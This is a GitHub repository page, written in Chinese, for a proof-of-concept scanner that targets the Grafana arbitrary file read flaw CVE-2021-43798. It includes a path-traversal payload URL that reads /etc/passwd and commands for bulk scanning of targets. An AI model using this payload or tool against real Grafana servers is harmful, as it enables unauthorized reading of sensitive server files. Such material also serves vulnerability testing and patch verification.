Skip to content

M0ge/CVE-2021-43798-grafana_fileread

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2021-43798-grafana_fileread

如果对象经过反向代理处理,可以将payload替换成这条

url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。

CVE: CVE-2021-43798
组件: Grafana 漏洞类型: 文件读取
影响: 获取敏感信息
简述: 未授权的攻击者利用该漏洞,能够获取服务器敏感文件

使用说明

1、对单个URL进行检测

python3 grafana_fileread.py -u http://localhost:3000

image 获取到的数据能够在grafana 8.x_fileread_vuln.txt文件中查看 image 2、对文件内的IP进行检测

python3 grafana_fileread.py -u http://localhost:3000

image

3、-h 查看帮助 image

About

grafana CVE-2021-43798任意文件读取漏洞POC,采用多插件轮训检测的方法,允许指定单URL和从文件中读取URL

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages